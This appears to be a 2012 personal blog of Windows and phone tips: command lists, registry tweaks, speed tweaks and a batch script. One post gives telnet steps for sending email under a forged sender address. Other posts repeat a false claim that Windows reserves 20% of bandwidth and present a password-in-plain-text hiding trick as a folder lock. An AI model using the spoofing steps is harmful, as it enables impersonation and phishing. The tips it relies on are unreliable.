Friday 28 December 2012

iPhone codes

CONTACT ME ON FACEBOOK -----  FACEBOOK.COM/LOVEWASE13

*3001#12345#*      Enters Field mode which allows you to access most of the hidden settings and functions of your iPhone

*#06#          Display the IMEI of your iPhone, as always this is the standard code for all brands of phones.

*225#          Displays the account balance for postpaid contracts

*777#         Displays the account balance for prepaid accounts

*646#        Displays the remaining minutes available

*3282#      Get your data usage information

*729           Options to make payments

611             Dials customer service, (114 in RSA for Vodacom)



Thursday 20 December 2012

Download Desired Torrent file with IDM!! [High Speed]



Download Desired Torrent file with IDM!! [High Speed]

How to Download Desired Torrent file with IDM!!  [High Speed]

STEPS:

1. First of all , you have to download the torrent file(.torrent) which you want to download...!

 2. Then just go to the website http://www.torcache.net and upload the torrent file that you have just downloaded and click on the cache! button..,,!

 3. This will give you a new torrent file . You just have to copy the link of the new torrent file from the opened window..,,..!

 4. Then go to the website http://www.torrific.com and create an account there(in case you don’t have) and login to your account. Then paste the address of the new torrent obtained in step 3 and click on Get button.,.,,...!

5. Now you will get the list of available files present in that torrent file. Then click on the initiate bittorrent transmission button. This will give the full option to download the file. Just click on any link and you can see the download manager-IDM popping out for downloading the file.,.,.!!

Have a nice dayy,,,,now enjoy the ultimate speed of IDM for downloading torrents too

DOS Commands......

 CONNECT ON FACEBOOK--- FACEBOOK.COM/LOVEWASE13

DOS Commands......

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension association
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
HOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders

Saturday 15 December 2012

Create Audio From Text using Notepad

CONNECT ON FACEBOOK-- FACEBOOK.COM/LOVEWASE13

Create Audio From Text using Notepad !

So today I'm going to share with you a

simple code of vb script
so just open the notepad and type this Code:

Dim msg, sapi
msg=InputBox("Enter your text for conversion– Dhananjay","dhananjay247.blogspot.com")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

  now save it as textconverter.vbs 
then open it .

Tuesday 4 December 2012

How To Remove and Add Right-Click Menu Items



How To Remove and Add Right-Click Menu Items from Files and Folders
Removing Items
A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times, you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer visible!
Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at all difficult once you know the keys responsible for the additions.

For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the Root key, right here:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Click the the + sign next to the ContextMenuHandlers key, to expand it.
Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys you don't want.
Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid value by placing a period or dash in front of it.
ie; - {b5eedee0-c06e-11cf-8c56-444553540000}
Then exit the registry, refresh, and right click a file to see if the item was removed from the menu.
Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be removed by deleting or disabling their one context menu handler.

Note that the above key only applies to the right click menu of files.
To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys:

HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers
HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers


All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove.
Adding Items
Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use Notepad as an example of an item you'd like to add to the right click menu of all your files or folders.

For folders, go to this key:
HKEY_CLASSES_ROOT\Folder
Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the right-click menu). Now right click the new key you made and create another key named Command. Then, in the right hand pane, double click "Default" and enter Notepad.exe as the value.
Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu.


For files, go here again:

HKEY_CLASSES_ROOT\*
Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then right click the Shell key and continue on the same way you did for adding items to the right click menu of folders.
Once done, Notepad should appear as an option in the right click menu of all your files.


Wednesday 21 November 2012

How to hack/change your Windows XP Boot Screen




How to hack/change your Windows XP Boot Screen


HACKING THE XP BOOT SCREEN

This is a very simple trick to do if you have done the same for the logon screen and the start button. There are 2 ways to do this trick that I know about one is doing it manually and the other is using a program called bootxp. I am going to tell you the manual way to do it, but if you want to know the other way just let me know, so I can do an update to the guide. Now once you have downloaded your ntoskrnl.exe file save it a general location so that you will have easy access to it, like my folder.



Once you have ntoskrnl.exe file in an easy access folder, restart your pc into safe mode. Once into safe mode go to the folder where your files are located.



Now that you are there copy the file that you want to change your boot screen too. Once you have copied that file, hit the window key + r or type %windir%\system32 in the run command, so that folder as follows.

Once there paste your new file into the folder and overwrite the existing folder.

Now that you have your new file in the folder restart your pc as you normally would and your new boot screen should appear. You can download this bootscreen here.

ALWAYS BACKUP EVERYTHING YOU EDIT OR DELETE. I'M NOT RESPONSIBLE IF YOU MESS YOUR COMPUTER UP BY DOING THIS HACK OR ANY TYPE OF HACK. DO IT AT YOUR OWN RISK.

Image and ntoskrnl.exe files provided by www.themexp.org

or
u can go to

code:

http://www.overclockersclub.com/guides/hackxpbootscreen.php

Sunday 11 November 2012

How To Increase Download Speeds By 100-200 Kbsec



How To Increase Download Speeds By 100-200 Kbsec


 First of all download this wonderful program:

h@@p://www.speedguide.net/files/TCPOptimizer.exe

Then when u start trhe program goto settings goto cable modem or dsl whatevcer u have.

Go to MaxMTU and set it to 1500 this is optimal anything above this will not work as well.

Thats bout it!! Enjoy the speed!!

Friday 9 November 2012

create a virtual drive for your desired folder in my computer


 CONNECT ON FACEBOOK--- FACEBOOK.COM/LOVEWASE13
today we are going to tell you about a secret DOS command "subst" which can be used to create a virtual drive in Windows Explorer for any of your desired folder.
For example, if you frequently use a folder "E:\Wallpapers", then you can create a virtual drive in Explorer which will directly go to this folder whenever you double click on it or access it from RUN or Command Prompt. It'll save a lot of time.
Here is how to do it:
1. Open Command Prompt and provide following command:
subst drive_letter: folder_path
for example, if you want to create a virtual drive letter H: for a folder "E:\Wallpapers", then use following command:
subst H: E:\Wallpapers
Creating_Virtual_Drive_using_subst_.jpg
2. It'll immediately create a virtual drive H: which will represent the "Wallpapers" folder:
Before using subst command:
Default_Drives_in_My_Computer.jpg
After using subst command:
Virtual_Drive_in_My_Computer.jpg
3. As you can see. A new drive letter H: has been created which directly goes to "E:\Wallpapers" folder upon double-click.
4. If you want to delete this virtual drive, then provide following command:
subst drive_letter: /D
for example, we created H: drive in Step1, so our command to delete this virtual drive would be:
subst H: /D
Deleting_Virtual_Drive_using_subst_.jpg
5. You can view a list of all existing virtual drives by simply giving subst command without any parameter in Command Prompt.
NOTE:
A. Remember! You can't use existing drive letters for creating virtual drives, e.g. if you have 2 partitions C: and D:, then you can't use them for subst command.
B. You should not use chkdsk, diskcomp, diskcopy, format, label and recover commands on virtual drives created using subst command as these virtual drives are not real and these commands either will not work or can cause problems for the actual drives where the folders reside.

Friday 2 November 2012



Windows uses 20% of your bandwidth Here's how to Get it back

A nice little tweak for XP. Microsoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

This opens the group policy editor. Then go to:


Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth


Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing, rather than the default 20%.

I have tested on XP Pro
other o/s not tested.

Please give me feedback about your results

Sunday 28 October 2012

Ultimate List of All Kinds of User Restrictions for Windows


 CONNECT ON FACEBOOK--- FACEBOOK.COM/LOVEWASE13

Ultimate List of All Kinds of User Restrictions for Windows

Share this article: Facebook | Twitter | Google+ | Reddit | Email | Leave a comment

Many times people access our system and change our customized settings here and there. Wouldn't it be great if we can restrict them to change the settings and other things like restrict from changing Folder Options, Taskbar settings, Desktop settings, etc.
Today in this tutorial, we'll share a list of some important and useful restrictions, which can be put in Windows 2000, XP, Server 2003, Vista, Server 2008, Windows 7 and Windows 8.
STEP 1: Open Registry Editor

All restrictions are based on Registry editing. So you'll need to open Registry Editor by providing regedit command in RUN or Start menu Search box and press Enter. After that go to the registry key mentioned in step 2.
STEP 2: Create Registry Key

Once you are in Registry Editor. Go to following keys and create or modify required DWORD value as mentioned below:
Windows_Restrictions_List.png
========================================
1. Restricting Desktop Properties
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System
Create new DWORD NoDispCPL and set its value to 1
If you want to restrict any particular tab in Desktop Properties like Themes, Screen Saver, etc, you can take help of following tutorial:
How to Enable / Disable Changing Themes, Wallpapers, Screen Savers and Other Settings
Also check: How to Restrict Users from Changing Desktop Wallpaper in Windows?
2. Restricting Taskbar Properties
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoSetTaskbar and set its value to 1
3. Restricting System Properties
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoPropertiesMyComputer and set its value to 1
4. Restricting Folder Options
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoFolderOptions and set its value to 1
5. Restricting Registry Editor
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System
Create new DWORD DisableRegistryTools and set its value to 1
6. Restricting Task Manager
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\System
Create new DWORD DisableTaskMgr and set its value to 1
7. Restricting Control Panel
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoControlPanel and set its value to 1
Also check following tutorial:
How to Hide / Show Specific Control Panel Applets / Icons in Windows?
8. Restricting Command Prompt
Go to following key:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
Create new DWORD DisableCMD and set its value to 2
9. Restricting Locking/Unlocking of Taskbar
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD LockTaskbar and set its value to 1
10. Restricting right-click on Taskbar
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoTrayContextMenu and set its value to 1
11. Restricting Toolbars in Taskbar
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoToolbarsOnTaskbar and set its value to 1
12. Restricting drag-and-drop and right-click in Start Menu
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoChangeStartMenu and set its value to 1
13. Restricting RUN in Start Menu
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoRun and set its value to 1
14. Restricting Shut Down, Restart, Sleep and Hibernate commands

Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoClose and set its value to 1
15. Restricting Log off in Start Menu

Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD StartMenuLogOff and set its value to 1
16. Restricting Active Desktop Feature
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoActiveDesktop and set its value to 1
17. Restricting adding/removing items to/from Toolbars
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoToolbarCustomize and set its value to 1
18. Restricting adding/removing Toolbars
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoBandCustomize and set its value to 1
19. Restricting Autorun Feature

Visit following tutorial:
How to Disable Autorun Functionality in Windows Using Registry Editor?
20. Restricting notification at low disk space
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
Create new DWORD NoLowDiskSpaceChecks and set its value to 1
21. Restricting Writing to USB Drives
Go to following key:
HKEY_LOCAL_MACHINE\SYSTEM\Current Control Set\Control\StorageDevicePolicies
Create new DWORD WriteProtect and set its value to 1
Also check following tutorial:
How to Disable / Restrict Use of USB Storage Devices in Windows?
22. Restricting "New" option in context menu
Go to following key:
HKEY_CLASSES_ROOT\Directory\Background\shellex\ContextMenu Handlers\New
And delete the value of Default, e.g., empty it.
Also check: How to Enable / Disable "New -> Shortcut" in Windows XP, Vista and 7 Context Menu?
23. Restricting "Send To" option in context menu
Go to following key:
HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex\ContextMenu Handlers\Send To
And delete the value of Default, e.g., empty it.
24. Restricting any desired application
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer\DisallowRun
Create new String value with any name, like 1 and set its value to the desired program's EXE file.
e.g., If you want to restrict msconfig, then create a String value 1 and set its value to msconfig.exe. If you want to restrict more programs, simply create more String values with names 2, 3 and so on and set their values to the program's exe file.
25. Restricting Drives in My Computer
Go to following key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
In right-side pane, create new DWORD NoViewOnDrive and change its value as following:
3 : To Restrict A and B drives only.
4 : To Restrict C drive only.
7 : To Restrict A, B, and C drives only.
8 : To Restrict D drive only.
F : To Restrict A, B, C, and D drives only.
03FFFFFF : To Restrict all drives.
If you want more specific restrictions, like you want to restrict a combination of drives, you can use decimal no. instead of hexadecimal no. Following is a list for all drives decimal no.:
A: 1
B: 2
C: 4
D: 8
E: 16
F: 32
G: 64
H: 128
I: 256
J: 512
K: 1024
L: 2048
M: 4096
N: 8192
O: 16384
P: 32768
Q: 65536
R: 131072
S: 262144
T: 524288
U: 1048576
V: 2097152
W: 4194304
X: 8388608
Y: 16777216
Z: 33554432
ALL: 67108863
So if you want to disable a combination of drives, just sum their numbers and give the same value to NoViewOnDrive. e.g., for restricting C, D, E and F drives, give the value: 4+8+16+32 = 60
PS: You can also hide the drives using NoDrives DWORD value. The location and its value remain same as the above trick.
Also check: How to Restrict / Hide / Remove Drives in Windows Explorer?
26. Restricting Settings and Options in Internet Explorer Web Browser
Check out following topics to restrict users from changing homepage and various settings in Internet Explorer:
How to Restrict Users from Changing Internet Explorer Homepage Settings?
How to Disable Options, Disable Tabs in Internet Explorer's Internet Options Dialog Box?
27. Restricting Desired Key in Keyboard or Changing Key Action
Check out following tutorial to customize any key behavior or disable a key permanently:
Customize or Disable Any Key in Your Keyboard Using SharpKeys
28. Restricting "Always use selected program to open this kind of file" Option in Open With Dialog Box?
Check out following tutorial to disable the "Always use selected program to open this kind of file" checkbox which appears in "Open With" dialog box:
How to Disable "Always use selected program to open this file" Option in Open With Dialog Box?
29. Restricting "Switch User" Option in Windows Vista and 7
Visit following article to learn how to disable "Switch User" option in Windows:
How to Disable "Switch User" Option in Windows Vista and 7?
30. Restricting Settings, Downloads, Bookmarks, etc in Mozilla Firefox
Check out following topic to restrict users from changing options, adding bookmarks, downloading files, etc in Mozilla Firefox:

Thursday 11 October 2012

Ultimate Collection of Registry Tweaks to Speed Up Windows 7

 CONNECT ON FACEBOOK--- FACEBOOK.COM/LOVEWASE13

1. Registry Tweaks:
Following topic contains a few registry tweaks to optimize your system performance and add a few useful extras:
Ultimate Collection of Registry Tweaks to Speed Up Windows 7
You just need to download the ZIP file, extract it and run the file. It'll ask for confirmation, accept it. Restart your system to take affect.
2. Right-click on Computer icon on Desktop and select Properties (or press WIN + Pause/Break keys). Now click on Advanced system settings link in left side pane (You can open it directly by giving sysdm.cpl command in RUN or start menu search box). Now click on Settings button in Performance section:

It'll open another window. Disable all unnecessary options in Visual Effects tab, you can leave following options enabled according to your requirements:
  • Enable Aero Peek (If you want to use Aero Peek feature)
  • Enable desktop composition (If you want to use Windows Aero theme)
  • Enable transparent glass (If you want to use transparency in Windows)
  • Show thumbnails instead of icons (If you want to show thumbnails in Explorer)
  • Show window contents while dragging (If you want windows to show contents while moving them)
  • Smooth edges of screen fonts (If you want to show smooth fonts)
  • Use drop shadows for icon labels on the desktop (If you want to show shadows under desktop icon labels)
  • Use visual styles on windows and buttons (If you want to use Windows Aero or Basic theme)

3. Open Windows Explorer and go to "Organize -> Folder and Search Options" and click on "View" tab.
Now disable following options:
  • Display file size information in folder tips
  • Hide extensions for known file types
  • Show encrypted or compressed NTFS files in color
  • Show pop-up description for folder and desktop items
Windows_Folder_Options.png
4. Right-click on Computer icon on Desktop and select Manage (You can also open it directly by giving services.msc command in RUN or start menu search box).
Now go to Services & Applications -> Services. Here you can set a few unnecessary services to Manual, so that these services don't start automatically with Windows and you can get a faster startup.

Visit following tutorial to know which services can be set to MANUAL to increase system performance:
Windows 7 Services Configuration: Turn Off / Disable Unnecessary Services to Optimize Performance
5. Type msconfig in RUN or Start Menu search box and press Enter. Now go to Startup tab and disable unwanted startup entries. You can disable your graphics card's driver utility, Sound Card utility, etc to speed up the system startup and to increase system performance.

6. Open Sound applet in Control Panel (or type mmsys.cpl in RUN or Start Menu search box and press Enter). Now go to Sounds tab and select No Sounds from Sound Scheme section. You can keep some of your favorite sounds enabled but make sure to set Exit Windows, Windows Log off, Windows Logon and Start Navigation to (None).

Also disable "Play Windows Startup sound" option to disable the sound clip which is played at login screen.
7. Also don't forget to:
  • Defrag the hard disk regularly
  • Install only necessary software
  • Use the latest device drivers
  • Keep your Windows up-to-date

folder lock code for any window to lock folder



folder lock code for any window to lock folder

cls
:End
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==trickyanswers goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End

Wednesday 5 September 2012

WINDOWS XP HIDDEN APPS

WINDOWS XP HIDDEN APPS

To run any of these apps go to Start > Run and type the executable name (ie charmap).

WINDOWS XP HIDDEN APPS:
=========================================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions

Tuesday 28 August 2012

Spoofing emails, via telenet

 get a smtp server ( i use mx1.hotmail.com) theyre normally like
mx1,mx2 etc..thehost.com.

Now, go to Start>Run>cmd
then in the cmd window, type
telnet mx1.hotmail.com 25
then
HELO hotmail.com
then
MAIL FROM : (fakeemailhere)
then
RCPT TO: (person)
then
DATA
then type your message, you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter!

spoofed.


Wednesday 8 August 2012

Speed Up Internet


 Speed Up Internet

Windows 2k/XP

1. First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
2. Note the following lines (all hex dwords):
Class = 008 ( biggrin.gif - indicates that TCP/IP is a name service provider, don't change
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name-resolution, including WINS
3. What we're aiming to do is increase the priority of the last 4 settings, while keeping their order. The valid range is from -32768 to +32767 and lower numbers mean higher priority compared to other services. What we're aiming at is lower numbers without going to extremes, something like what's shown below should work well:
4. Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 ( biggrin.gif - NetBT name-resolution, including WINS
5. Reboot for changes to take effect

2. Windows 9x/ME

1. The tweak is essentialy the same as in Windows 2000/XP, just the location in the Registry is slightly different. For a more detailed description see the Windows 2000/XP section above
2. Open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider
3. You should see the following settings:
Class=hex:08,00,00,00

LocalPriority=hex:f3,01,00,00
HostsPriority=hex:f4,01,00,00
DnsPriority=hex:d0,07,00,00
NetbtPriority=hex:d1,07,00,00
4. The "priority" lines should be changed to:
LocalPriority=hex:05,00,00,00
HostsPriority=hex:06,00,00,00
DnsPriority=hex:07,00,00,00
NetbtPriority=hex:08,00,00,00
5. Reboot for changes to take effect

3. System.ini IRQ Tweak - Windows 9x/ME ONLY

1. Find your Network Card's IRQ

1. In order to add the entry to your System.ini file, you'd first have to find your NIC's IRQ
2. Right-click on My Computer icon on your Desktop, then left-click on Properties (a shortcut for that would be to press the 'Windows' + 'Pause' keys). Navigate to Device Manager and double-click on Computer. Under "View Resources" you will find a list of IRQs, each with description of the device that's using it. Note the IRQ number used by your Network Adapter

2. Adding the entry to System.ini

1. Once you've found the IRQ of your Network Card, you need to reserve some RAM for its use, by adding an entry to the System.ini file. You can edit the file in any text editor, however the easiest way is to use Windows' built in "System Configuration Editor"
2. Navigate to Start > Run and type sysedit . Find the [386enh] Section in the System.ini file and add Irq[n]=4096 under it, where [n] is the IRQ number of your NIC and 4096 is the amount of RAM you want to reserve in Kbytes. We recommend using 4096, however you can experiment with different values if you want. Save changes in the file, exit and reboot for changes to take effect.
